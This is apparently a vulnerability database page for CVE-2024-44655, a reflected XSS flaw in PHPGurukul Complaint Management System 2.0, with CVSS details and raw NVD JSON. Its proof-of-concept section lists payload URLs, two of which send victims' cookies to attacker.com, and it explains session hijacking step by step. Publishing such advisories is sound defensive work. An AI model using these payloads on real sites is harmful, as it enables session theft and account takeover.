Security Vulnerability Report
中文
CVE-2024-44655 CVSS 6.1 MEDIUM

CVE-2024-44655

Published: 2025-11-17 19:16:16
Last Modified: 2025-11-18 20:47:05

Description

PHPGurukul Complaint Management System 2.0 is vulnerable to Cross Site Scripting (XSS) via the search parameter in user-search.php.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:phpgurukul:complaint_management_system:2.0:*:*:*:-:*:*:* - VULNERABLE
PHPGurukul Complaint Management System 2.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2024-44655 PoC - Reflected XSS in PHPGurukul CMS 2.0 --> <!-- Target: user-search.php search parameter --> <!-- Basic XSS PoC --> https://target-site/user-search.php?search=<script>alert('XSS')</script> <!-- Cookie Stealing PoC --> https://target-site/user-search.php?search=<script>document.location='https://attacker.com/steal?c='+document.cookie</script> <!-- HTML Injection + XSS --> https://target-site/user-search.php?search=<img src=x onerror=alert(document.domain)> <!-- Advanced Payload - Session Hijacking --> https://target-site/user-search.php?search=<script>fetch('https://attacker.com/log?cookie='+btoa(document.cookie))</script> <!-- PoC Explanation --> <!-- 1. Attacker crafts malicious URL with XSS payload --> <!-- 2. Victim clicks the link or is redirected to it --> <!-- 3. Server reflects the unsanitized search parameter --> <!-- 4. Victim's browser executes the injected JavaScript --> <!-- 5. Attacker steals session cookies or performs actions on behalf of victim -->

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2024-44655", "sourceIdentifier": "[email protected]", "published": "2025-11-17T19:16:15.853", "lastModified": "2025-11-18T20:47:04.863", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "PHPGurukul Complaint Management System 2.0 is vulnerable to Cross Site Scripting (XSS) via the search parameter in user-search.php."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:phpgurukul:complaint_management_system:2.0:*:*:*:-:*:*:*", "matchCriteriaId": "8C6D9515-0DC3-4727-B5B5-2E6C34362BF7"}]}]}], "references": [{"url": "https://github.com/leexsoyoung/CVEs/blob/main/CVE-2024-44655.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://phpgurukul.com/complaint-management-sytem", "source": "[email protected]", "tags": ["Product"]}]}}